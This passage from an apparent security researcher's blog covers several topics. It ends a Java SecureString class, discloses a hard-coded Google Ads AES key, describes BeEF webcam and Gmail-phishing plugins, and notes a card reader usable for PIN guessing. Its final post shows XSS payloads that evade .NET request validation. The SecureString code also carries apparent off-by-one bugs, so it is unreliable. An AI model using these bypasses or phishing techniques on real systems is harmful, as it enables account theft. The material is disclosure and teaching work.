			out.write((byte)(byteRepresentation[i]) ^ (byte)(OBFUSCATOR_BYTE));
		}
		//TODO: Test if the Android Intent is really only calling writeObject once,
		//otherwise this could be a problem. Then I suggest that the SecureString
		//is not passed in an intent (and never serialized)
		destroy();
	}
	
	/**
	 * We first have to deobfuscate the string by XORing with OBFUSCATOR_BYTE
	 * @param out
	 * @throws IOException
	 */
	private void readObject(java.io.ObjectInputStream in) throws IOException, ClassNotFoundException{
		//we first have to deobfuscate
		int newLength = in.readInt();
		byteRepresentation = new byte[newLength];
		for(int i = 0; i &lt; newLength; i++ ){
			byteRepresentation[i] = (byte) ((byte)(in.read()) ^ (byte)(OBFUSCATOR_BYTE));
		}
		initialise(byteRepresentation);
	}
	
	/**
	 * Use this method wisely
	 * 
	 * When the destroy() method of this SecureString is called, the byte[] 
	 * this method had returned will also be wiped!
	 * 
	 * Never WRITE directly to this byte[], but only READ
	 * 
	 * @return reference to byte[] of this SecureString
	 */
	public byte[] getByteArray(){
		if(this.isDestroyed)
			return null;
		return byteRepresentation;
	}
	
	/**
	 * This method should never be called.
	 */
	@Deprecated
	@Override
	public String toString(){
		return null;
	}
	
	/**
	 * This method should never be called, because it means you already stored the
	 * sensitive information in a String.
	 * @param string
	 * @return
	 * @throws Exception
	 */
	
	@Deprecated
	public boolean equals(String string) throws Exception{
		throw new Exception(&quot;YOU ARE NOT SUPPOSED TO CALL equals(String string) of SecureString, &quot;+
				&quot;because your are not supposed to have the other value in a string in the first place!&quot;);
	}
	/**
	 * This method should never be called, because it means you already stored the
	 * sensitive information in a String.
	 * @param string
	 * @return
	 * @throws Exception
	 */
	
	@Deprecated
	public boolean equalsIgnoreCase(String string) throws Exception{
		throw new Exception(&quot;YOU ARE NOT SUPPOSED TO CALL equalsIgnoreCase(String string) of SecureString, &quot;+
				&quot;because your are not supposed to have the other value in a string in the first place!&quot;);
	}
	/**
	 * Comparing if the two strings stored in the SecureString objects are equal
	 * @param secureString2
	 * @return true if strings are equal
	 */
	public boolean equals(SecureString secureString2){
		if(this.isDestroyed)
			return false;
		return Arrays.equals(this.charRepresentation, secureString2.charRepresentation);
	}
	
	/**
	 * Comparing if the two strings stored in the SecureString objects are equalsIgnoreCase
	 * @param secureString2
	 * @return true if strings are equal ignoring case
	 */
	public boolean equalsIgnoreCase(SecureString secureString2){
		if(this.isDestroyed)
			return false;
		return Arrays.equals(this.charRepresentationLower, secureString2.charRepresentationLower);
	}
	
	/**
	 * Delete a char at the given position
	 * @param index
	 */
	public void deleteCharAt(int index){
		if(this.isDestroyed)
			return;
		if(this.length == 0 || index &gt;= length)
			return;
		wipe(charRepresentationLower);
		wipe(byteRepresentation);
		char[] newCharRepresentation = new char[length-1];
		for(int i=0; i&lt;index; i++)
			newCharRepresentation[i] = charRepresentation[i];
		for(int i=index+1; i&lt;this.length-1; i++)
			newCharRepresentation[i-1] = charRepresentation[i];
		wipe(charRepresentation);
		initialise(newCharRepresentation);
	}
	
	/**
	 * Append a char at the end of the string
	 * @param c
	 */
	public void append(char c){
		wipe(charRepresentationLower);
		wipe(byteRepresentation);
		char[] newCharRepresentation = new char[length+1];
		for(int i=0; i&lt;this.length; i++)
			newCharRepresentation[i] = charRepresentation[i];
		newCharRepresentation[length-1] = c;
		wipe(charRepresentation);
		initialise(newCharRepresentation);
	}
	
	/**
	 * Internal method to wipe a char[]
	 * @param chars
	 */
	private void wipe(char[] chars){
		for(int i=0; i&lt;chars.length; i++){
			//set to hex AA
			int val = 0xAA;
			chars[i] = (char) val; 
			//set to hex 55
			val = 0x55;
			chars[i] = (char) val; 
			//set to hex 00
			val = 0x00;
			chars[i] = (char) val; 
		}
	}
	
	/**
	 * Internal method to wipe a byte[]
	 * @param chars
	 */
	private void wipe(byte[] bytes){
		for(int i=0; i&lt;bytes.length; i++){
			//set to hex AA
			int val = 0xAA;
			bytes[i] = (byte) val; 
			//set to hex 55
			val = 0x55;
			bytes[i] = (byte) val; 
			//set to hex 00
			val = 0x00;
			bytes[i] = (byte) val;
		}
	}
	
	/**
	 * Safely wipes all the data
	 */
	public void destroy(){
		if(this.isDestroyed)
			return;
		wipe(charRepresentation);
		wipe(charRepresentationLower);
		wipe(byteRepresentation);
		
		//loose references
		charRepresentation = null; 
		charRepresentationLower = null; 
		byteRepresentation = null; 
		
		this.length = 0;
		
		//TODO: call garbage collector?
		//Runtime.getRuntime().gc();
		
		this.isDestroyed = true;		
	}
	
	/**
	 * This method is only to check if non-sensitive data
	 * is part of the SecureString
	 * @return true if SecureString contains the given String
	 */
	public boolean contains(String nonSensitiveData){
		if(this.isDestroyed)
			return false;
		if(nonSensitiveData.length() &gt; this.length)
			return false;
		char[] nonSensitiveDataChars = nonSensitiveData.toCharArray();
		int positionInNonSensitiveData = 0;
		for(int i=0; i &lt; this.length; i++){
			if(positionInNonSensitiveData == nonSensitiveDataChars.length)
				return true;
			if(this.charRepresentation[i] == nonSensitiveDataChars[positionInNonSensitiveData])
				positionInNonSensitiveData++;
			else
				positionInNonSensitiveData = 0;
		}
		return false;
	}
}

Does that make any sense? How does the Java VM handle this? And how does the Android Dalvik Java VM handle this? Does the Android system cache the UI inputs anyway (so there would be no point in wiping our copies)? Is the data really going to be wiped when I use this class? Where are the real Java internals heroes out there?

Update 1, 11th September 2013: Added Beerware license. Note: This was just some idea I had. Use at your own risk.

Google Ads Encryption Key

Just this last time I will talk about this encryption key, but then I’ll shut up (for me this is so 2011). I presented this thing last year at conferences, but if you just look at the slides I think it’s hard to get the point.

During my Android research in 2011 I encountered several bad practises that are wide spread. Especially hard-coded symmetric encryption keys in the source code of Android apps are often used. One special occurence of one of these encryption keys I just couldn’t forget: Why would Google (Ads) themself use such a thing? It’s not a big deal, but it just adds no real protection and I kept wondering.

445 apps I decompiled used Google Ads code and included the following AES symmetric encryption key:

byte[] arrayOfByte1 = { 10, 55, -112, -47, -6, 7, 11, 75, 
                       -7, -121, 121, 69, 80, -61, 15, 5 };

This AES key is used to encrypt the last known location of the user (all location providers: GPS, WIFI, etc) and send it to Google via the JSON uule parameter. Most of the time the key is located in com.google.ads.util.AdUtil.java, com.google.ads.LocationTracker.java or if the app uses an obfuscator in u.java or r.java. Here’s the corresponding code:

String getLocationParam(){
    List localList = getLastKnownLocations();
    StringBuilder localStringBuilder1 = new StringBuilder();
    int i = 0;
    int j = localList.size();
    if (i < j){
      Location localLocation = (Location)localList.get(i);
      String str1 = protoFromLocation(localLocation);
      String str2 = encodeProto(str1);
      if (str2 != null){
        if (i != 0)
          break label89;
        StringBuilder localStringBuilder2 = localStringBuilder1.append("e1+");
      }
      while (true){
        StringBuilder localStringBuilder3 = localStringBuilder1.append(str2);
        i += 1;
        break;
        label89: StringBuilder localStringBuilder4 = localStringBuilder1.append("+e1+");
      }
    }
    return localStringBuilder1.toString();
  }

String encodeProto(String paramString){
    try{
      Cipher localCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
      byte[] arrayOfByte1 = { 10, 55, 144, 209, 250, 7, 11, 75, 249, 135, 121, 69, 80, 195, 15, 5 };
      SecretKeySpec localSecretKeySpec = new SecretKeySpec(arrayOfByte1, "AES");
      localCipher.init(1, localSecretKeySpec);
      byte[] arrayOfByte2 = localCipher.getIV();
      byte[] arrayOfByte3 = paramString.getBytes();
      byte[] arrayOfByte4 = localCipher.doFinal(arrayOfByte3);
      int i = arrayOfByte2.length;
      int j = arrayOfByte4.length;
      byte[] arrayOfByte5 = new byte[i + j];
      int k = arrayOfByte2.length;
      System.arraycopy(arrayOfByte2, 0, arrayOfByte5, 0, k);
      int m = arrayOfByte2.length;
      int n = arrayOfByte4.length;
      System.arraycopy(arrayOfByte4, 0, arrayOfByte5, m, n);
      String str1 = Base64.encodeToString(arrayOfByte5, 11);
      str2 = str1;
      return str2;
    }
    catch (GeneralSecurityException localGeneralSecurityException){
      while (true)
        String str2 = null;
    }
  }

This code was produced by a decompiler, so it won’t compile, but you get the idea. Instead of using symmetric crypto, they should have used asymmetric crypto (public key in app, private key on server). There would be no way to intercept the last known location on the network then. Ok, here’s the timeline:

June 2011: Notified security@google.com (auto-response)
October 2011: Talked about it at 0sec / #days and spoke to two friends at Google who are not in the Android/Ads team. One of them (thank you!) sent my mail to the responsible people at Google.
Februar 2012: After a couple of emails I got the answer that they are going to switch to SSL

If you ever find the uule parameter on your network, let me know. One last thing: Depending on your decompiler, the AES key will look like this (wrong decompilation):

byte[] arrayOfByte1 = { 10, 55, 144, 209, 250, 7, 11, 75, 
                       249, 135, 121, 69, 80, 195, 15, 5 };

This is not a valid way to define a byte array in Java, because the integers must be between -127 and 128 (signed integers). That’s another funny fact: if you ever have to brute force a Java byte array like this, I would start with keys where every byte starts with a 0 bit (MSB=0). I saw a lot more of those keys. It seems that some Java developers don’t know about the instantiation with signed integers and therefore choose only numbers between 0 and 128.

BeEF webcam and Gmail plugin

The BeEF project is one of the better tools to demonstrate the impacts of XSS. I always wondered why there was no webcam plugin, so here we go, I coded two new plugins. Both are already part of BeEF now, so just go on, update your BeEF installation and you’re good to go. I made a demo video for the webcam plugin, you can watch it on vimeo: BeEF webcam plugin using flash.

Additionally I wrote a Gmail phishing plugin, that uses a Cross Site Request Forgery (XSRF) on the Gmail logout button (invalidates the session on the server). That means you have to relogin to Gmail (in all tabs/windows of your browser). Then the plugin changes the XSSed site to a Gmail phishing page. If the user enters his credentials, they get submitted to the BeEF server/attacker. The user will be redirected to the real Gmail login page.

I’m still improving the plugins, so if you have any comments, let me know.

Free OWASP membership

Timeline:

  • Beginning of 10.2011: OWASP was informed (including details) that the OWASP membership registration has a logic flaw (“please inform vendor”).
  • Beginning of 10.2011: Response from OWASP, vendor can not reproduce problem. Sent more details.
  • Beginning of 10.2011: Response from OWASP, vendor still can’t reproduce problem. Sent video below.
  • 19.10.2011: Bug report opened.
  • 15.02.2012: Checked back and asked OWASP if problem is resolved.
  • 26.02.2012: They don’t know. Checked flaw again, it still exists. Advised OWASP to get in touch with one of the organisation’s security expert to handle the issue (no response from OWASP).
  • 30.03.2012: Checked flaw again, it still exists. Informed OWASP and vendor directly that the video will be released in two weeks if it doesn’t get fixed.
  • 30.03.2012: Response from OWASP, they would find a solution until end of April. Agreed to wait until end of April.
  • 04.04.2012: Response from vendor, it’s fixed.

In my opinion half a year is long enough. Putting on some more pressure (regarding the release of the video) worked very well. I felt like I owe it to all the paying OWASP members.

Enough words, enjoy the video: https://www.floyd.ch/download/free-owasp-membership.mov

PostFinance Digipass 810

Here in Switzerland, PostFinance (the bank of the national mail company) uses a small, yellow card reader for the two-factor authentication (I don’t want to talk about how good this two-factor authentication is, but errrr). Because I don’t need my device anymore I decided to poke around a little bit. First of all, it’s really nice that they tell you from the beginning which type of card reader it is (sticker on the back):

Digipass 810
MADE IN CHINA
WWW.VASCO.COM
US PATENTS: 4.599489 and 4.609777

Easy start. If you look Digipass 810 up, you’ll see that it is compliant to something called “Europay-Mastercard-Visa Chip Authentication Program Enhancements”. A card which has no chip at all, will get you the error message “Falsche Karte” (“wrong card” in German). It doesn’t like my debit cards either (which have chips on them), it displays different error messages: “Karte Ungültig” (“invalid card”) and “card error”. So I simply tried my credit cards and both (Visa and Mastercard) did work. The reader prompts for a code/challenge, I just entered 1234 and it asked for my PIN. Interestingly it will only accept the correct PIN which was set for the credit card and will then output some TAN. A wrong PIN will result in an error message. Funny!

So a malicious person who wants to try out the PINs for your credit card, but doesn’t want to risk to be recorded by a security camera at the ATM can use a Digipass 810 instead.

TODO (i still need my credit card):
– Check if you really only have 3 tries
– Check if card is really locked (e.g. in store or at an ATM) after 3 tries
– Of course there is much more card stuff out there, eg. a presentation at PHNeutral 2011

Microsoft .NET: Circumventing XSS request validation

Ha – I’m back!

I guess most of you know how annoying it is to start a Web Pentest and notice that the request validation of Microsoft IIS / .NET is on. I mean the big red error messages “A potentially dangerous request…” or for the .NET programmers, the HttpRequestValidationException. I nearly always found a way around it. There is a really nice post on stackoverflow about which kind of characters will trigger the exception. But for the lazy ones a list of unallowed strings I figured out myself a while ago:

&#
</
<?
<!
<a to <z
<A to <Z

Firstly, you can just not use the < and & character. Just find a place where you are already inside a tag and write something like [code] " onmouseover="alert(123)" alt=" [/code] Second of all, a string that is allowed and I claim to be the first one who found it (I'm sure I was just not able to find someone else who did it before, let me know!): [code] <%# [/code] Yeah, wow, I know. It's not really that impressive and you can't construct a working XSS with it, but you can use it to break the HTML code (at least in Internet Explorer). But nice anyway. Additionally, you can send your XSS payload in any of the HTTP Headers to .NET and it won't be checked. Or if there is a Web Service which does the same as the Web Application, just send a SOAP request with the XSS string (no HttpRequestValidationException there). Of course there are always different encodings that could work. For example you could try HTML (<) and Unicode (\u003c). Enjoy!